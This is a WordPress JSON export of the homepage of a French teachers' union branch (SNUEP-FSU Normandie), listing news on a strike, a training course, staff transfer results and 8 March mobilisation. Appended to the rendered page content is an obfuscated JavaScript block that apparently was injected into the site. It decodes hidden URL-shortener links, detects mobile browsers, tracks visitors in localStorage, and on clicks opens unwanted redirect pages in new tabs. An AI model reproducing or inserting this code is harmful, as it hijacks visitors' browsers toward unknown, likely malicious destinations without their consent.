

{"id":2,"date":"2020-07-23T21:14:47","date_gmt":"2020-07-23T19:14:47","guid":{"rendered":"http:\/\/reims2.snuep.fr\/?page_id=2"},"modified":"2025-09-22T15:00:30","modified_gmt":"2025-09-22T13:00:30","slug":"page-d-exemple","status":"publish","type":"page","link":"https:\/\/normandie.snuep.fr\/","title":{"rendered":"Accueil"},"content":{"rendered":"<header><div class=\"slider post_slider\"><div class=\"posts-slider\" data-slick ='{\"slidesToShow\":1,\"slidesToScroll\":1,\"autoplay\":false}'>\n<div class=\"slider-item\">\n\t\t<div class=\"slider-img-bg\">\n\t\t<img decoding=\"async\" src=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2026\/03\/WhatsApp-Image-2025-11-27-a-11.59.28_c11587a1-1900x816.jpg\">\n\t<\/div>\n\t<div class=\"slider-content-description\">\n\t\t<h2>Gr\u00e8ve le mardi 31\u00a0mars - Semaine de mobilisation du 30\u00a0mars au 3\u00a0avril<\/h2>\n\t\t<!--<span class=\"line-center-green\"><\/span>-->\n\t\t<p class=\"slider-post-content\">Depuis plusieurs mois, la FSU avec les autres organisations (UNSA \u00c9ducation, CFDT \u00c9ducation, CGT \u00c9duc\u2019action\u2026<\/p>\n\t\t<p class=\"slider-post-link\"><a href=\"https:\/\/normandie.snuep.fr\/?p=119534\">En savoir plus<\/a><\/p>\n\t<\/div>\n<\/div>\n\n<div class=\"slider-item\">\n\t\t<div class=\"slider-img-bg\">\n\t\t<img decoding=\"async\" src=\"\">\n\t<\/div>\n\t<div class=\"slider-content-description\">\n\t\t<h2>Stage droits et devoirs, obligations des fonctionnaires\u00a0!<\/h2>\n\t\t<!--<span class=\"line-center-green\"><\/span>-->\n\t\t<p class=\"slider-post-content\">Le SNUEP-FSU Normandie, avec le SNES-FSU, organise un stage intitul\u00e9 \u00ab&nbsp;Droits et devoirs, obligations des\u2026<\/p>\n\t\t<p class=\"slider-post-link\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93495\">En savoir plus<\/a><\/p>\n\t<\/div>\n<\/div>\n\n<div class=\"slider-item\">\n\t\t<div class=\"slider-img-bg\">\n\t\t<img decoding=\"async\" src=\"\">\n\t<\/div>\n\t<div class=\"slider-content-description\">\n\t\t<h2>La PSC kesako ?<\/h2>\n\t\t<!--<span class=\"line-center-green\"><\/span>-->\n\t\t<p class=\"slider-post-content\">Le SNUEP-FSU Normandie le rappelle, nous portons le mandat d\u2019un 100% s\u00e9curit\u00e9 sociale pour les\u2026<\/p>\n\t\t<p class=\"slider-post-link\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93494\">En savoir plus<\/a><\/p>\n\t<\/div>\n<\/div>\n\n<div class=\"slider-item\">\n\t\t<div class=\"slider-img-bg\">\n\t\t<img decoding=\"async\" src=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2026\/02\/acnormandie-carte-des-bassins-14270.jpg\">\n\t<\/div>\n\t<div class=\"slider-content-description\">\n\t\t<h2>Mutations Intra 2026, c\u2019est maintenant !<\/h2>\n\t\t<!--<span class=\"line-center-green\"><\/span>-->\n\t\t<p class=\"slider-post-content\">Le r\u00e9sultat des mutations inter acad\u00e9miques sera communiqu\u00e9 aux int\u00e9ress\u00e9\u00b7e\u00b7s le&nbsp;mercredi 11&nbsp;mars. Chaque acad\u00e9mie \u00e9tablit\u2026<\/p>\n\t\t<p class=\"slider-post-link\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93498\">En savoir plus<\/a><\/p>\n\t<\/div>\n<\/div>\n\n<div class=\"slider-item\">\n\t\t<div class=\"slider-img-bg\">\n\t\t<img decoding=\"async\" src=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/Photo_mutation-1900x816-1-1220x400-1.jpg\">\n\t<\/div>\n\t<div class=\"slider-content-description\">\n\t\t<h2>R\u00e9sultats du mouvement inter acad\u00e9mique 2026\u00a0!<\/h2>\n\t\t<!--<span class=\"line-center-green\"><\/span>-->\n\t\t<p class=\"slider-post-content\">Les r\u00e9sultats des mouvement inter acad\u00e9mique 2026 sont annonc\u00e9s par le rectorat le mercredi 11\u2026<\/p>\n\t\t<p class=\"slider-post-link\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93491\">En savoir plus<\/a><\/p>\n\t<\/div>\n<\/div>\n<\/div><\/div><\/header>\n\n\n<div class=\"posts_list\"><div class=\"post-119534 list-item \"><h2><a href=\"https:\/\/normandie.snuep.fr\/?p=119534\">Gr\u00e8ve le mardi 31\u00a0mars - Semaine de mobilisation du 30\u00a0mars au 3\u00a0avril<\/a><\/h2><p class=\"post-item-date\"><span class=\"posted-on\"><time class=\"entry-date published\" datetime=\"2026-03-27T09:59:53+01:00\">27 mars 2026<\/time><time class=\"updated\" datetime=\"2026-03-27T09:59:54+01:00\">27 mars 2026<\/time><\/span><\/p><p class=\"\">Depuis plusieurs mois, la FSU avec les autres organisations (UNSA \u00c9ducation, CFDT \u00c9ducation, CGT \u00c9duc\u2019action et SUD \u00c9ducation) d\u00e9noncent les\u2026<\/p><p class=\"line-left-violet\">&nbsp;<\/p><p class=\"post-item-links\"><span class=\"social-share\"><a class=\"share-link facebook\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/www.facebook.com\/sharer.php?u=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D119534')\"><i class=\"icon-facebook\" aria-hidden=\"true\"><\/i><\/a><a class=\"share-link twitter\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/twitter.com\/share?text=Gr\u00e8ve le mardi 31\u00a0mars - Semaine de mobilisation du 30\u00a0mars au 3\u00a0avril&url=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D119534')\"><i class=\"icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span class=\"see_more\"><a href=\"https:\/\/normandie.snuep.fr\/?p=119534\">En savoir plus<\/a><\/span><\/p><\/div><div class=\"post-93495 list-item middle_post\"><h2><a href=\"https:\/\/normandie.snuep.fr\/?p=93495\">Stage droits et devoirs, obligations des fonctionnaires\u00a0!<\/a><\/h2><p class=\"post-item-date\"><span class=\"posted-on\"><time class=\"entry-date published updated\" datetime=\"2026-03-05T12:12:52+01:00\">5 mars 2026<\/time><\/span><\/p><p class=\"\">Le SNUEP-FSU Normandie, avec le SNES-FSU, organise un stage intitul\u00e9 \u00ab&nbsp;Droits et devoirs, obligations des fonctionnaires&nbsp;\u00bb le mardi 12 mai\u2026<\/p><p class=\"line-left-violet\">&nbsp;<\/p><p class=\"post-item-links\"><span class=\"social-share\"><a class=\"share-link facebook\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/www.facebook.com\/sharer.php?u=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93495')\"><i class=\"icon-facebook\" aria-hidden=\"true\"><\/i><\/a><a class=\"share-link twitter\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/twitter.com\/share?text=Stage droits et devoirs, obligations des fonctionnaires\u00a0!&url=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93495')\"><i class=\"icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span class=\"see_more\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93495\">En savoir plus<\/a><\/span><\/p><\/div><div class=\"post-93494 list-item \"><h2><a href=\"https:\/\/normandie.snuep.fr\/?p=93494\">La PSC kesako ?<\/a><\/h2><p class=\"post-item-date\"><span class=\"posted-on\"><time class=\"entry-date published updated\" datetime=\"2026-03-05T11:41:06+01:00\">5 mars 2026<\/time><\/span><\/p><p class=\"\">Le SNUEP-FSU Normandie le rappelle, nous portons le mandat d\u2019un 100% s\u00e9curit\u00e9 sociale pour les soins prescrits, ainsi que le\u2026<\/p><p class=\"line-left-violet\">&nbsp;<\/p><p class=\"post-item-links\"><span class=\"social-share\"><a class=\"share-link facebook\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/www.facebook.com\/sharer.php?u=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93494')\"><i class=\"icon-facebook\" aria-hidden=\"true\"><\/i><\/a><a class=\"share-link twitter\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/twitter.com\/share?text=La PSC kesako ?&url=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93494')\"><i class=\"icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span class=\"see_more\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93494\">En savoir plus<\/a><\/span><\/p><\/div><div class=\"post-93498 list-item \"><h2><a href=\"https:\/\/normandie.snuep.fr\/?p=93498\">Mutations Intra 2026, c\u2019est maintenant !<\/a><\/h2><p class=\"post-item-date\"><span class=\"posted-on\"><time class=\"entry-date published\" datetime=\"2026-03-05T11:00:49+01:00\">5 mars 2026<\/time><time class=\"updated\" datetime=\"2026-03-05T11:00:50+01:00\">5 mars 2026<\/time><\/span><\/p><p class=\"\">Le r\u00e9sultat des mutations inter acad\u00e9miques sera communiqu\u00e9 aux int\u00e9ress\u00e9\u00b7e\u00b7s le&nbsp;mercredi 11&nbsp;mars. Chaque acad\u00e9mie \u00e9tablit ensuite son propre bar\u00e8me et\u2026<\/p><p class=\"line-left-violet\">&nbsp;<\/p><p class=\"post-item-links\"><span class=\"social-share\"><a class=\"share-link facebook\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/www.facebook.com\/sharer.php?u=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93498')\"><i class=\"icon-facebook\" aria-hidden=\"true\"><\/i><\/a><a class=\"share-link twitter\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/twitter.com\/share?text=Mutations Intra 2026, c\u2019est maintenant !&url=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93498')\"><i class=\"icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span class=\"see_more\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93498\">En savoir plus<\/a><\/span><\/p><\/div><div class=\"post-93491 list-item middle_post\"><h2><a href=\"https:\/\/normandie.snuep.fr\/?p=93491\">R\u00e9sultats du mouvement inter acad\u00e9mique 2026\u00a0!<\/a><\/h2><p class=\"post-item-date\"><span class=\"posted-on\"><time class=\"entry-date published\" datetime=\"2026-03-05T10:58:02+01:00\">5 mars 2026<\/time><time class=\"updated\" datetime=\"2026-03-05T10:58:03+01:00\">5 mars 2026<\/time><\/span><\/p><p class=\"\">Les r\u00e9sultats des mouvement inter acad\u00e9mique 2026 sont annonc\u00e9s par le rectorat le mercredi 11 mars \u00e0 12h. Si vous\u2026<\/p><p class=\"line-left-violet\">&nbsp;<\/p><p class=\"post-item-links\"><span class=\"social-share\"><a class=\"share-link facebook\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/www.facebook.com\/sharer.php?u=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93491')\"><i class=\"icon-facebook\" aria-hidden=\"true\"><\/i><\/a><a class=\"share-link twitter\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/twitter.com\/share?text=R\u00e9sultats du mouvement inter acad\u00e9mique 2026\u00a0!&url=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93491')\"><i class=\"icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span class=\"see_more\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93491\">En savoir plus<\/a><\/span><\/p><\/div><div class=\"post-93488 list-item \"><h2><a href=\"https:\/\/normandie.snuep.fr\/?p=93488\">Pour un 8 mars combatif\u00a0!<\/a><\/h2><p class=\"post-item-date\"><span class=\"posted-on\"><time class=\"entry-date published\" datetime=\"2026-03-05T09:45:46+01:00\">5 mars 2026<\/time><time class=\"updated\" datetime=\"2026-03-05T11:59:41+01:00\">5 mars 2026<\/time><\/span><\/p><p class=\"\">Le 8 mars, mobilisons-nous massivement pour la gr\u00e8ve f\u00e9ministe !&nbsp;L\u2019\u00e9galit\u00e9 ne se n\u00e9gocie pas, elle se conquiert. Les lieux et\u2026<\/p><p class=\"line-left-violet\">&nbsp;<\/p><p class=\"post-item-links\"><span class=\"social-share\"><a class=\"share-link facebook\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/www.facebook.com\/sharer.php?u=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93488')\"><i class=\"icon-facebook\" aria-hidden=\"true\"><\/i><\/a><a class=\"share-link twitter\" href=\"javascript:void(0)\" onclick=\"javascript:genericSocialShare('http:\/\/twitter.com\/share?text=Pour un 8 mars combatif\u00a0!&url=https%3A%2F%2Fnormandie.snuep.fr%2F%3Fp%3D93488')\"><i class=\"icon-twitter\" aria-hidden=\"true\"><\/i><\/a><\/span><span class=\"see_more\"><a href=\"https:\/\/normandie.snuep.fr\/?p=93488\">En savoir plus<\/a><\/span><\/p><\/div><\/div>\n\n\n<div class=\"archives_list\"><div class=\"category_list-item\"><a href=\"https:\/\/normandie.snuep.fr\/?dossiers=dossier-3\"><img decoding=\"async\" src=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2026\/02\/nous-contacter.jpg\"><div class=\"list_item-title\"><h2>NOUS CONTACTER<\/h2><\/div><\/a><\/div><div class=\"category_list-item middle_post\"><a href=\"https:\/\/normandie.snuep.fr\/?dossiers=dossier-1\"><img decoding=\"async\" src=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2026\/02\/Communication-Logo-PNG-Clipart-Background.png\"><div class=\"list_item-title\"><h2>ESPACE COMMUNICATION<\/h2><\/div><\/a><\/div><div class=\"category_list-item\"><a href=\"https:\/\/normandie.snuep.fr\/?dossiers=dossier-2\"><img decoding=\"async\" src=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2026\/02\/fonction-publique-cpictrider.jpg\"><div class=\"list_item-title\"><h2>TEXTES FONCTION PUBLIQUE<\/h2><\/div><\/a><\/div><\/div>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x79\\x4e\\x57\\x33\\x63\\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x7a\\x68\\x6d\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x69\\x63\\x44\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x70\\x6b\\x39\\x63\\x319','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x74\\x6c\\x65\\x34\\x63\\x314','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x43\\x78\\x64\\x37\\x63\\x387','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4c\\x6b\\x78\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x78\\x74\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4e\\x54\\x62\\x30\\x63\\x370','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x74\\x75\\x5a\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-2","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Accueil - SNUEP-FSU NORMANDIE<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/normandie.snuep.fr\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Accueil - SNUEP-FSU NORMANDIE\" \/>\n<meta property=\"og:url\" content=\"https:\/\/normandie.snuep.fr\/\" \/>\n<meta property=\"og:site_name\" content=\"SNUEP-FSU NORMANDIE\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-22T13:00:30+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/cropped-tetiere_FB_828x315-academie-22.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"380\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/normandie.snuep.fr\/\",\"url\":\"https:\/\/normandie.snuep.fr\/\",\"name\":\"Accueil - SNUEP-FSU NORMANDIE\",\"isPartOf\":{\"@id\":\"https:\/\/normandie.snuep.fr\/#website\"},\"datePublished\":\"2020-07-23T19:14:47+00:00\",\"dateModified\":\"2025-09-22T13:00:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/normandie.snuep.fr\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/normandie.snuep.fr\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/normandie.snuep.fr\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/normandie.snuep.fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Accueil\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/normandie.snuep.fr\/#website\",\"url\":\"https:\/\/normandie.snuep.fr\/\",\"name\":\"SNUEP-FSU NORMANDIE\",\"description\":\"sa.normandie@snuep.fr\",\"publisher\":{\"@id\":\"https:\/\/normandie.snuep.fr\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/normandie.snuep.fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/normandie.snuep.fr\/#organization\",\"name\":\"SNUEP-FSU NORMANDIE\",\"url\":\"https:\/\/normandie.snuep.fr\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/normandie.snuep.fr\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/cropped-logo_snuep_fsu_ACADEMIE_tetiere_site_internet-22.jpg\",\"contentUrl\":\"https:\/\/normandie.snuep.fr\/wp-content\/uploads\/2025\/01\/cropped-logo_snuep_fsu_ACADEMIE_tetiere_site_internet-22.jpg\",\"width\":1080,\"height\":228,\"caption\":\"SNUEP-FSU NORMANDIE\"},\"image\":{\"@id\":\"https:\/\/normandie.snuep.fr\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Accueil - SNUEP-FSU 